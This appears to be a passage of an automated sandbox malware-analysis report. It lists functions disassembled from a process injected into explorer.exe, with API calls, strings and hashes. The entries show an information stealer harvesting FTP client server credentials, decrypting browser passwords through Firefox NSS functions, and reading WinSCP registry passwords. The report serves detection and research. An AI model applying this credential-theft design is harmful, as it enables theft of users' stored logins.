                                                                                                                                        • Instruction ID: a64f52fdff1c5339fc5e9511beb5240e6237ba6252f8a019e5411bf6409d1827
                                                                                                                                        • Opcode Fuzzy Hash: 9fc1b8364bd1eda483a326e9c7ef932992c3cad32f76cd16e36a4edc2bd915d7
                                                                                                                                        • Instruction Fuzzy Hash: 5AC19D70A08B029FCB15DF25C494A2BB7E6BFC8714F04892DF89597245EB31E952CF92
                                                                                                                                        Function 02754440 Relevance: 38.8, APIs: 12, Strings: 10, Instructions: 289stringcommemoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CoCreateInstance.COMBASE(027A62B0,00000000,00000001,027A62A0,?), ref: 0275445F
                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 027544AA
                                                                                                                                        • lstrcmpiW.KERNEL32(RecentServers,?), ref: 0275456E
                                                                                                                                        • lstrcmpiW.KERNEL32(Servers,?), ref: 0275457D
                                                                                                                                        • lstrcmpiW.KERNEL32(Settings,?), ref: 0275458C
                                                                                                                                          • Part of subcall function 027511E1: lstrlenW.KERNEL32(?,74DEF360,00000000,?,00000000,?,027546E3), ref: 027511ED
                                                                                                                                          • Part of subcall function 027511E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 0275120F
                                                                                                                                          • Part of subcall function 027511E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 02751231
                                                                                                                                        • lstrcmpiW.KERNEL32(Server,?), ref: 027545BE
                                                                                                                                        • lstrcmpiW.KERNEL32(LastServer,?), ref: 027545CD
                                                                                                                                        • lstrcmpiW.KERNEL32(Host,?), ref: 02754657
                                                                                                                                        • lstrcmpiW.KERNEL32(Port,?), ref: 02754679
                                                                                                                                        • lstrcmpiW.KERNEL32(User,?), ref: 0275469F
                                                                                                                                        • lstrcmpiW.KERNEL32(Pass,?), ref: 027546C5
                                                                                                                                        • wsprintfW.USER32 ref: 0275471E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcmpi$String$BinaryCrypt$AllocCreateInstancelstrlenwsprintf
                                                                                                                                        • String ID: %s:%s$Host$LastServer$Pass$Port$RecentServers$Server$Servers$Settings$User
                                                                                                                                        • API String ID: 2230072276-1234691226
                                                                                                                                        • Opcode ID: 7af4061f37b4626563e72175882b5c37bc1470b7f1c640ba0523b179e66b7f2e
                                                                                                                                        • Instruction ID: d7096533367db9e29c03d99d08192efbd9febc6116427f93a020df4ed8a251c8
                                                                                                                                        • Opcode Fuzzy Hash: 7af4061f37b4626563e72175882b5c37bc1470b7f1c640ba0523b179e66b7f2e
                                                                                                                                        • Instruction Fuzzy Hash: C6B1F771204312AFD700DF64C894E6ABBF9EFC9759F00895CFA598B160DB71E846CB52
                                                                                                                                        Function 027524B0 Relevance: 35.1, APIs: 11, Strings: 9, Instructions: 143libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02751000: GetProcessHeap.KERNEL32(00000008,?,027511C7,?,?,00000001,00000000,?), ref: 02751003
                                                                                                                                          • Part of subcall function 02751000: RtlAllocateHeap.NTDLL(00000000), ref: 0275100A
                                                                                                                                          • Part of subcall function 02751090: lstrlenW.KERNEL32(?,?,00000000,027517E5), ref: 02751097
                                                                                                                                          • Part of subcall function 02751090: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000), ref: 027510A8
                                                                                                                                          • Part of subcall function 027519B4: lstrlenW.KERNEL32(00000000,00000000,00000000,02752CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 027519C4
                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,00000000), ref: 02752503
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(00000000), ref: 0275250A
                                                                                                                                        • LoadLibraryW.KERNEL32(00000000), ref: 02752563
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 02752570
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 02752591
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,NSS_Shutdown), ref: 0275259E
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SECITEM_FreeItem), ref: 027525AB
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,PK11_GetInternalKeySlot), ref: 027525B8
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,PK11_Authenticate), ref: 027525C5
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,PK11SDR_Decrypt), ref: 027525D2
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,PK11_FreeSlot), ref: 027525DF
                                                                                                                                          • Part of subcall function 0275190B: lstrlen.KERNEL32(?,?,?,?,00000000,02752783), ref: 0275192B
                                                                                                                                          • Part of subcall function 0275190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,02752783), ref: 02751930
                                                                                                                                          • Part of subcall function 0275190B: lstrcat.KERNEL32(00000000,?), ref: 02751946
                                                                                                                                          • Part of subcall function 0275190B: lstrcat.KERNEL32(00000000,00000000), ref: 0275194A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$lstrlen$CurrentDirectory$Heaplstrcat$AllocateByteCharLibraryLoadMultiProcessWide
                                                                                                                                        • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$SECITEM_FreeItem$nss3.dll$sql:
                                                                                                                                        • API String ID: 3366569387-3272982511
                                                                                                                                        • Opcode ID: 86ffe3480d4e7b072e72aadcf369c886ffdac472fbd4a3508bd40c787149e0f8
                                                                                                                                        • Instruction ID: e772a9e6bbf7be4294b35a26eb7287527050a02d6407f9d84fec61b9f3651c9f
                                                                                                                                        • Opcode Fuzzy Hash: 86ffe3480d4e7b072e72aadcf369c886ffdac472fbd4a3508bd40c787149e0f8
                                                                                                                                        • Instruction Fuzzy Hash: 55410731E413618BDB15AF3558ACA2FBBDADFC5651744452EEC49A3241DBB48C01CF91
                                                                                                                                        Function 02755E5A Relevance: 23.1, APIs: 6, Strings: 7, Instructions: 382COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02755BF5: memset.NTDLL ref: 02755C07
                                                                                                                                        • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 027560E1
                                                                                                                                        • _allrem.NTDLL(00000000,?,00000007,00000000), ref: 027560EC
                                                                                                                                        • _alldiv.NTDLL(?,?,000003E8,00000000), ref: 02756113
                                                                                                                                        • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 0275618E
                                                                                                                                        • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 027561B5
                                                                                                                                        • _allrem.NTDLL(00000000,?,00000007,00000000), ref: 027561C1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _alldiv$_allrem$memset
                                                                                                                                        • String ID: %.16g$%02d$%03d$%04d$%06.3f$%lld$W
                                                                                                                                        • API String ID: 2557048445-1989508764
                                                                                                                                        • Opcode ID: 2c4ce2acafae57abd3fabe19e3c55f067538505d8eb4e7891d4984004e04002b
                                                                                                                                        • Instruction ID: 8cd19b252f91b5e55a721c25da0920ac9ef5544046a12e892d0f874fa89b050e
                                                                                                                                        • Opcode Fuzzy Hash: 2c4ce2acafae57abd3fabe19e3c55f067538505d8eb4e7891d4984004e04002b
                                                                                                                                        • Instruction Fuzzy Hash: 95B180B19083619BD7269E24CC88B3BFFD9EF81304FD40649FC86A61D0E7E1C551CA91
                                                                                                                                        Function 0276D2AC Relevance: 19.7, APIs: 1, Strings: 12, Instructions: 169COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • memcmp.NTDLL(027A637A,BINARY,00000007), ref: 0276D324
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memcmp
                                                                                                                                        • String ID: %.16g$%lld$%s(%d)$(%.20s)$(blob)$,%d$,%s%s$BINARY$NULL$k(%d$program$vtab:%p
                                                                                                                                        • API String ID: 1475443563-3683840195
                                                                                                                                        • Opcode ID: 281471e501a553e70773be24996ef10ea5fd6d5d5e6ae6f5a43ea34acf8e06fd
                                                                                                                                        • Instruction ID: 4d478d8deb07c8f9acfce7944a9b77061afe1b6df68f0340a3e6bcb1f3e7e6f3
                                                                                                                                        • Opcode Fuzzy Hash: 281471e501a553e70773be24996ef10ea5fd6d5d5e6ae6f5a43ea34acf8e06fd
                                                                                                                                        • Instruction Fuzzy Hash: A9510471A14310EBE729CF65CC48B7BBBE7AB85210F090969FC569B240E370EC05CB92
                                                                                                                                        Function 027548B1 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 113COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 027519E5: RegOpenKeyExW.KERNEL32(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02751AE2,PortNumber,00000000,00000000), ref: 02751A1E
                                                                                                                                          • Part of subcall function 027519E5: RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02751A3C
                                                                                                                                          • Part of subcall function 027519E5: RegQueryValueExW.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02751A75
                                                                                                                                          • Part of subcall function 027519E5: RegCloseKey.KERNEL32(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02751AE2,PortNumber,00000000,00000000), ref: 02751A98
                                                                                                                                          • Part of subcall function 0275482C: lstrlenW.KERNEL32(?), ref: 02754845
                                                                                                                                          • Part of subcall function 0275482C: lstrlenW.KERNEL32(?), ref: 0275488F
                                                                                                                                          • Part of subcall function 0275482C: lstrlenW.KERNEL32(?), ref: 02754897
                                                                                                                                        • wsprintfW.USER32 ref: 027549A7
                                                                                                                                        • wsprintfW.USER32 ref: 027549B9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$QueryValuewsprintf$CloseOpen
                                                                                                                                        • String ID: %s:%u$%s:%u/%s$HostName$Password$RemoteDirectory$UserName
                                                                                                                                        • API String ID: 2889301010-4273187114
                                                                                                                                        • Opcode ID: 084f457141db22ffb1187e7de7a7f87676a81b4f154631b65445bff0f4c5de29
                                                                                                                                        • Instruction ID: f755d673fab57e1090602cd5f513ea6c0e9c1e41dd092451aa273f6b589bcce6
                                                                                                                                        • Opcode Fuzzy Hash: 084f457141db22ffb1187e7de7a7f87676a81b4f154631b65445bff0f4c5de29
                                                                                                                                        • Instruction Fuzzy Hash: 1E315860B083245BDB11AF65CC2692BFADEFFC5648B094A1DF80593240DBF2DC418BA1
                                                                                                                                        Function 0275F92F Relevance: 12.4, APIs: 4, Strings: 4, Instructions: 350COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • memcpy.NTDLL(?,?,?,?,00000000), ref: 0275FB32
                                                                                                                                        • memcpy.NTDLL(?,?,00000000,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 0275FB4D
                                                                                                                                        • memcpy.NTDLL(?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 0275FB60
                                                                                                                                        • memcpy.NTDLL(?,?,?,?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030), ref: 0275FB95
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memcpy
                                                                                                                                        • String ID: -journal$-wal$immutable$nolock
                                                                                                                                        • API String ID: 3510742995-3408036318
                                                                                                                                        • Opcode ID: 71b03420e7739b4feab9a55570d141835f83cccbbfec7fc31eed7d09dc40a671
                                                                                                                                        • Instruction ID: e8dbf6d393776dfb0a372dbae5819be3e162e672823f4921acbe1e52d4313084
                                                                                                                                        • Opcode Fuzzy Hash: 71b03420e7739b4feab9a55570d141835f83cccbbfec7fc31eed7d09dc40a671
                                                                                                                                        • Instruction Fuzzy Hash: FDD1D3B16083518FDB15DF28C894B2AFBE6AF86314F08456DEC998B391D7B4D805CB53
                                                                                                                                        Function 02757820 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 407COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: %$-x0$NaN
                                                                                                                                        • API String ID: 0-62881354
                                                                                                                                        • Opcode ID: 7049a20814f9db024332af0ed743570b45b0198c6335cca04a79c901589cf7dd
                                                                                                                                        • Instruction ID: fd5ef80cdf4e6f0b6d6f3a6023565d0f225b129cc67e066db7a88c7c94e075c2
                                                                                                                                        • Opcode Fuzzy Hash: 7049a20814f9db024332af0ed743570b45b0198c6335cca04a79c901589cf7dd
                                                                                                                                        • Instruction Fuzzy Hash: BDD1E530A0C3A18FD72A8E29849472BFBE6AFC6208F54495DFCC597391D7E5C945CB82
                                                                                                                                        Function 027578B0 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 441COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: -x0$NaN
                                                                                                                                        • API String ID: 0-3447725786
                                                                                                                                        • Opcode ID: 04f62c294c565bed4aabe5d186b712de92f4a5967747d7a12dddd5991d9035f7
                                                                                                                                        • Instruction ID: 3e5393828b28f81b030635ae0c11146c8ca1e61e3a113623b33490e3daadb6c9
                                                                                                                                        • Opcode Fuzzy Hash: 04f62c294c565bed4aabe5d186b712de92f4a5967747d7a12dddd5991d9035f7
                                                                                                                                        • Instruction Fuzzy Hash: 98E1E530A083A18BD72A8E28C45473BFBE6AFC6218F18495DECC597391D7E5C945CB92
                                                                                                                                        Function 02757A5C Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 431COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: -x0$NaN
                                                                                                                                        • API String ID: 0-3447725786
                                                                                                                                        • Opcode ID: 18c4dd1572a872440aa720b3dd04794a7ccf503e3af3d0e2573ae7331772e01e
                                                                                                                                        • Instruction ID: 74011286b7e9bf79bf306ea310433640220cec55f550cee7b76cacb99041256b
                                                                                                                                        • Opcode Fuzzy Hash: 18c4dd1572a872440aa720b3dd04794a7ccf503e3af3d0e2573ae7331772e01e
                                                                                                                                        • Instruction Fuzzy Hash: B5E1E330A083A18BD72A8E29C49472BFBE6AFC6208F54495DFCC597391D7F1C945CB92
                                                                                                                                        Function 02757A28 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 426COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: -x0$NaN
                                                                                                                                        • API String ID: 0-3447725786
                                                                                                                                        • Opcode ID: 913ee9661e4b760fa96d917b8dced89e32ddcf218ec727e0ec7b0408f2906a31
                                                                                                                                        • Instruction ID: 0dc5b4de0b258d9db097d651eed529abc6b50f646d82267ef9a9678d182dc889
                                                                                                                                        • Opcode Fuzzy Hash: 913ee9661e4b760fa96d917b8dced89e32ddcf218ec727e0ec7b0408f2906a31
                                                                                                                                        • Instruction Fuzzy Hash: F1E1D470A083A18BD7298E29C49472BFBE6AFC6208F18495DFCC597391D7F5C945CB82
                                                                                                                                        Function 027577F9 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 414COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: -x0$NaN
                                                                                                                                        • API String ID: 0-3447725786
                                                                                                                                        • Opcode ID: 7bc033775d0738c64a11a7a6eacce9012f5791f718c9cadad124cc2e086e9921
                                                                                                                                        • Instruction ID: 7f4a37cc30c7bd6b2b2accf919742e10e0ce218b08b17f837438c3e79e7d3bea
                                                                                                                                        • Opcode Fuzzy Hash: 7bc033775d0738c64a11a7a6eacce9012f5791f718c9cadad124cc2e086e9921
                                                                                                                                        • Instruction Fuzzy Hash: C6E1E470A083A18FD7298E29C49472BFBE5AFC6208F14495DFCC597391D7E5C945CB82
                                                                                                                                        Function 027570C9 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 403COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _aulldvrm.NTDLL(00000000,00000002,0000000A,00000000), ref: 0275720E
                                                                                                                                        • _aullrem.NTDLL(00000000,?,0000000A,00000000), ref: 02757226
                                                                                                                                        • _aulldvrm.NTDLL(00000000,00000000,?), ref: 0275727B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _aulldvrm$_aullrem
                                                                                                                                        • String ID: -x0$NaN
                                                                                                                                        • API String ID: 105165338-3447725786
                                                                                                                                        • Opcode ID: 00107a476863af593f3ff0a456b15743a60ccb00621aa4fc888b74cf48dfc826
                                                                                                                                        • Instruction ID: 4e4eb6caecec5081714e49b9b62e260e83df97150d73736eecd24aa608be728b
                                                                                                                                        • Opcode Fuzzy Hash: 00107a476863af593f3ff0a456b15743a60ccb00621aa4fc888b74cf48dfc826
                                                                                                                                        • Instruction Fuzzy Hash: B2D1F530A0C3A18FD72A8E29849472BFBE6AFC6208F14495DFCC597391D7E5C945CB82
                                                                                                                                        Function 0275898F Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 353COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _allmul.NTDLL(00000000,?,0000000A,00000000), ref: 02758AAD
                                                                                                                                        • _allmul.NTDLL(?,?,0000000A,00000000), ref: 02758B66
                                                                                                                                        • _allmul.NTDLL(?,00000000,0000000A,00000000), ref: 02758C9B
                                                                                                                                        • _alldvrm.NTDLL(?,00000000,0000000A,00000000), ref: 02758CAE
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _allmul$_alldvrm
                                                                                                                                        • String ID: .
                                                                                                                                        • API String ID: 115548886-248832578
                                                                                                                                        • Opcode ID: 75900410a1e09c906492b99e1aa9ee0c83b87cbc27929d8f93ee48125278c761
                                                                                                                                        • Instruction ID: a6d062ebe18857f8d8ff441b97dbcec808c80acb07cee382bfe0d4d265d8c8ce
                                                                                                                                        • Opcode Fuzzy Hash: 75900410a1e09c906492b99e1aa9ee0c83b87cbc27929d8f93ee48125278c761
                                                                                                                                        • Instruction Fuzzy Hash: 34D1F3B190E7A98BC3108F19848033AFBE1BFC9314F04499EFAD596281D7F18985CB87
                                                                                                                                        Function 0277D684 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 79COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memset
                                                                                                                                        • String ID: ,$7$9
                                                                                                                                        • API String ID: 2221118986-1653249994
                                                                                                                                        • Opcode ID: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
                                                                                                                                        • Instruction ID: 5b3a439b70d7fa0f227201c440d8b30989b058f6271083fc67341786bc9c3da5
                                                                                                                                        • Opcode Fuzzy Hash: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
                                                                                                                                        • Instruction Fuzzy Hash: 8231AD715083449FD731DF60D844B8FBBE9AFC5350F00892EE98997250EB719548CBA3
                                                                                                                                        Function 02751BC5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • lstrlenW.KERNEL32(00000000,00000000,?,02752E75,PathToExe,00000000,00000000), ref: 02751BCC
                                                                                                                                        • StrStrIW.SHLWAPI(00000000,.exe,?,02752E75,PathToExe,00000000,00000000), ref: 02751BF0
                                                                                                                                        • StrRChrIW.SHLWAPI(00000000,00000000,0000005C,?,02752E75,PathToExe,00000000,00000000), ref: 02751C05
                                                                                                                                        • lstrlenW.KERNEL32(00000000,?,02752E75,PathToExe,00000000,00000000), ref: 02751C1C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen
                                                                                                                                        • String ID: .exe
                                                                                                                                        • API String ID: 1659193697-4119554291
                                                                                                                                        • Opcode ID: 36f7453379d52c3c7214a145c34259a9a5a34326a299b9341b477b2638a1100d
                                                                                                                                        • Instruction ID: 12ab2800324c11e906a81ac6df54b59c289e6634ae81b6f4c5c2d559a56283ff
                                                                                                                                        • Opcode Fuzzy Hash: 36f7453379d52c3c7214a145c34259a9a5a34326a299b9341b477b2638a1100d
                                                                                                                                        • Instruction Fuzzy Hash: AFF0C8307516305AE7245F349C44BBBA799EF413527559C29E94AC3190F7F18881C759
                                                                                                                                        Function 02752112 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29timeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02751000: GetProcessHeap.KERNEL32(00000008,?,027511C7,?,?,00000001,00000000,?), ref: 02751003
                                                                                                                                          • Part of subcall function 02751000: RtlAllocateHeap.NTDLL(00000000), ref: 0275100A
                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?), ref: 02752127
                                                                                                                                        • _alldiv.NTDLL(?,?,00989680,00000000), ref: 0275213A
                                                                                                                                        • wsprintfA.USER32 ref: 0275214F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HeapTime$AllocateFileProcessSystem_alldivwsprintf
                                                                                                                                        • String ID: %li
                                                                                                                                        • API String ID: 4120667308-1021419598
                                                                                                                                        • Opcode ID: ce101e69ddaeb0d059ebf0e3e2d29b2bd8f79b06c5957bfd9384a58be5d0f5c2
                                                                                                                                        • Instruction ID: 09cbca8ffb1d6619662dd7393f384ef6cdfdf1a655e2cd97f7a3de3a5dee6268
                                                                                                                                        • Opcode Fuzzy Hash: ce101e69ddaeb0d059ebf0e3e2d29b2bd8f79b06c5957bfd9384a58be5d0f5c2
                                                                                                                                        • Instruction Fuzzy Hash: 10E09232E4021877DB213BA89C0AEEF7F6DDB80A26F484691FA04B2181E5724A2487D5
                                                                                                                                        Function 02762FF6 Relevance: 6.6, APIs: 5, Instructions: 369COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _allmul.NTDLL(?,00000000,00000018), ref: 0276316F
                                                                                                                                        • _allmul.NTDLL(-00000001,00000000,?,?), ref: 027631D2
                                                                                                                                        • _alldiv.NTDLL(?,?,00000000), ref: 027632DE
                                                                                                                                        • _allmul.NTDLL(00000000,?,00000000), ref: 027632E7
                                                                                                                                        • _allmul.NTDLL(?,00000000,?,?), ref: 02763392
                                                                                                                                          • Part of subcall function 027616CD: memset.NTDLL ref: 0276172B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _allmul$_alldivmemset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3880648599-0
                                                                                                                                        • Opcode ID: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
                                                                                                                                        • Instruction ID: 25c6bc0e2c9e543f40393eb7df74858c024b013eda00fc428592a6f4c1fd8ca7
                                                                                                                                        • Opcode Fuzzy Hash: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
                                                                                                                                        • Instruction Fuzzy Hash: 11D188716083418FDB25DF69C888B6ABBE6EFC8B04F04496DFD9597250DB70D849CB82
                                                                                                                                        Function 027887FA Relevance: 6.4, APIs: 1, Strings: 3, Instructions: 388COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: FOREIGN KEY constraint failed$new$old
                                                                                                                                        • API String ID: 0-384346570
